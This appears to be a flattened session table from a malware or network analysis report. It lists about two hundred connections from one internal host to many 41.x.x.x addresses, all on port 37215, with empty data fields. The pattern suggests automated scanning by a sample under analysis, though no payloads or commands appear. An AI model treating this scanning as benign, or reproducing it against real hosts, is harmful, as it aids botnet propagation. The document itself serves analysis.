                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3888192.168.2.155304441.247.35.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3889192.168.2.155266841.233.185.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3890192.168.2.154420841.13.94.237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3891192.168.2.155104641.168.155.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3892192.168.2.153805841.31.225.6637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3893192.168.2.154686641.150.242.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3894192.168.2.154741041.126.95.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3895192.168.2.155578641.228.152.11637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3896192.168.2.153436841.247.52.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3897192.168.2.156005641.172.46.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3898192.168.2.153418841.103.234.13037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3899192.168.2.153641241.0.55.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3900192.168.2.153413641.236.146.7037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3901192.168.2.155543641.191.106.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3902192.168.2.155871441.205.166.22037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3903192.168.2.153562041.251.90.137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3904192.168.2.154731641.209.233.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3905192.168.2.153432041.243.235.4837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3906192.168.2.155609441.241.233.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3907192.168.2.154951441.11.106.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3908192.168.2.155704441.18.211.23937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3909192.168.2.155314241.94.45.1237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3910192.168.2.155321041.76.101.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3911192.168.2.155324241.152.72.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3912192.168.2.154488441.130.150.13537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3913192.168.2.156061241.25.64.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3914192.168.2.154579241.133.163.16637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3915192.168.2.153374241.244.103.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3916192.168.2.153619041.21.90.24837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3917192.168.2.155960441.190.5.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3918192.168.2.153490041.17.92.6937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3919192.168.2.154402041.45.47.5937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3920192.168.2.153486841.244.176.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3921192.168.2.155194641.193.64.20037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3922192.168.2.155657841.242.99.7337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3923192.168.2.154991641.13.48.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3924192.168.2.154843241.165.225.8237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3925192.168.2.155133041.229.58.14937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3926192.168.2.155857041.108.13.15937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3927192.168.2.155643841.120.108.8637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3928192.168.2.155712841.114.24.19737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3929192.168.2.154542441.145.179.16737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3930192.168.2.154579041.34.111.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3931192.168.2.155144241.162.188.23137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3932192.168.2.154601441.211.96.5837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3933192.168.2.154136841.57.8.037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3934192.168.2.154715441.167.49.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3935192.168.2.154820241.21.133.3837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3936192.168.2.154776641.3.91.21537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3937192.168.2.153589041.65.74.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3938192.168.2.154294841.252.215.8737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3939192.168.2.155418841.136.167.17937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3940192.168.2.154103641.127.150.18237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3941192.168.2.153503641.243.127.25237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3942192.168.2.155349641.70.233.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3943192.168.2.154627641.46.72.1437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3944192.168.2.154347441.134.230.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3945192.168.2.154760841.65.135.23737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3946192.168.2.155356841.34.210.937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3947192.168.2.155802241.201.235.9137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3948192.168.2.153354441.105.142.9037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3949192.168.2.154275841.24.61.20937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3950192.168.2.153365841.120.234.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3951192.168.2.155023841.207.192.17337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3952192.168.2.155631241.52.23.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3953192.168.2.155455641.221.62.18337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3954192.168.2.155374041.87.233.16137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3955192.168.2.155316041.143.35.3637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3956192.168.2.153632641.237.136.7237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3957192.168.2.154364041.204.154.24337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3958192.168.2.155853641.31.157.16837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3959192.168.2.155968441.54.199.24437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3960192.168.2.153943841.227.219.3237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3961192.168.2.153444241.232.104.14237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3962192.168.2.155454841.199.73.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3963192.168.2.154899241.17.139.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3964192.168.2.153946241.48.183.17637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3965192.168.2.154694841.63.132.21437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3966192.168.2.155307441.243.140.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3967192.168.2.154471041.81.41.23437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3968192.168.2.155946041.33.50.17537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3969192.168.2.155873641.223.240.7737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3970192.168.2.153847641.43.151.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3971192.168.2.154784241.61.175.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3972192.168.2.155554641.74.38.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3973192.168.2.155150841.192.22.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3974192.168.2.155962641.178.132.11737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3975192.168.2.153994241.123.142.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3976192.168.2.156039841.240.3.11437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3977192.168.2.155689841.31.171.9937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3978192.168.2.155884041.185.205.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3979192.168.2.155291241.208.220.7437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3980192.168.2.153489041.217.189.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3981192.168.2.154961641.72.211.25337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3982192.168.2.154755841.152.5.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3983192.168.2.153807441.185.159.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3984192.168.2.154069641.56.146.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3985192.168.2.154187041.67.141.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3986192.168.2.155520841.236.218.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3987192.168.2.154040441.180.182.8337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3988192.168.2.153834441.125.40.23237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3989192.168.2.155103041.126.177.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3990192.168.2.154294841.16.94.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3991192.168.2.156020841.141.201.2637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3992192.168.2.153716041.115.3.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3993192.168.2.153853441.109.46.10537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3994192.168.2.156058641.241.161.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3995192.168.2.155980041.149.8.24137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3996192.168.2.153893241.240.16.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3997192.168.2.153532441.29.226.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3998192.168.2.154110241.163.81.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            3999192.168.2.156003441.8.198.7137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4000192.168.2.155957841.251.233.11337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4001192.168.2.154756041.224.26.19637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4002192.168.2.154630041.26.206.12637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4003192.168.2.153721041.42.71.17037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4004192.168.2.154868041.239.159.22837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4005192.168.2.155044641.26.228.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4006192.168.2.155654041.223.42.13137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4007192.168.2.153310041.178.240.5737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4008192.168.2.154608641.40.136.9837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4009192.168.2.153341841.63.165.12837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4010192.168.2.155074041.178.232.19837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4011192.168.2.154424241.219.71.5037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4012192.168.2.155264241.67.242.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4013192.168.2.155880441.204.14.11937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4014192.168.2.155522841.26.91.17837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4015192.168.2.155237241.69.101.16237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4016192.168.2.153424641.64.236.16337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4017192.168.2.155743241.195.111.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4018192.168.2.154189241.109.12.18737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4019192.168.2.156006641.52.136.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4020192.168.2.154744041.137.177.18037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4021192.168.2.156013441.165.141.12137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4022192.168.2.156093641.70.238.9337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4023192.168.2.154894041.48.81.23337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4024192.168.2.154450841.19.172.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4025192.168.2.155522841.221.255.2537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4026192.168.2.153824641.128.117.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4027192.168.2.153663841.78.234.21837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4028192.168.2.153481641.213.96.15337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4029192.168.2.154577441.87.12.11137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4030192.168.2.155949241.185.143.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4031192.168.2.155897041.190.154.10737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4032192.168.2.155328241.194.227.12437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4033192.168.2.155378441.254.196.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4034192.168.2.153915441.134.214.1737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4035192.168.2.154871241.123.247.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4036192.168.2.153885041.183.202.3937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4037192.168.2.154771641.186.91.13837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4038192.168.2.153718041.225.81.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4039192.168.2.154348641.28.251.3037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4040192.168.2.154600041.171.229.3537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4041192.168.2.153710841.161.166.737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4042192.168.2.155540841.186.42.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4043192.168.2.154756841.133.15.17437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4044192.168.2.154630841.114.169.4237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4045192.168.2.156091841.44.166.14737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4046192.168.2.153799841.251.162.4037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4047192.168.2.153641641.223.104.6137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4048192.168.2.155645041.33.74.20637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4049192.168.2.155626641.243.47.437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4050192.168.2.153801041.139.90.5137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4051192.168.2.155701841.138.114.18937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4052192.168.2.154622841.110.204.20837215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4053192.168.2.153548441.109.74.11037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4054192.168.2.153611441.24.233.9237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4055192.168.2.155877441.36.255.9637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4056192.168.2.154344241.59.117.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4057192.168.2.154597841.46.68.3137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4058192.168.2.154020041.154.143.12537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4059192.168.2.154400441.74.170.7537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4060192.168.2.153760441.210.235.13437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4061192.168.2.154398841.203.38.19037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4062192.168.2.155625841.191.43.16437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4063192.168.2.153756241.145.93.24237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4064192.168.2.155055841.85.245.2037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4065192.168.2.153964641.133.146.5437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4066192.168.2.155883041.143.107.4337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4067192.168.2.155144641.3.199.18437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4068192.168.2.154204641.39.169.3737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4069192.168.2.154016841.172.197.22237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4070192.168.2.155149041.185.24.14137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4071192.168.2.154580441.196.75.6237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4072192.168.2.154593241.97.41.20537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4073192.168.2.154976041.78.122.4537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4074192.168.2.153755041.162.160.3337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4075192.168.2.155950841.187.162.19137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4076192.168.2.154193241.46.189.15037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4077192.168.2.155088241.137.255.2137215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4078192.168.2.154094841.69.250.8937215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4079192.168.2.153339441.96.178.24737215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4080192.168.2.154909241.37.72.14537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4081192.168.2.154916441.0.136.16037215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4082192.168.2.153805841.72.159.337215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4083192.168.2.153283441.231.229.18537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4084192.168.2.154777441.43.207.24637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4085192.168.2.155787641.33.58.5237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4086192.168.2.155393841.174.249.24537215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4087192.168.2.155508841.15.113.15437215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4088192.168.2.154332641.48.244.21637215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4089192.168.2.155211841.161.88.15237215
                                                                            TimestampBytes transferredDirectionData


                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                            4090192.168.2.156005241.194.58.6937215
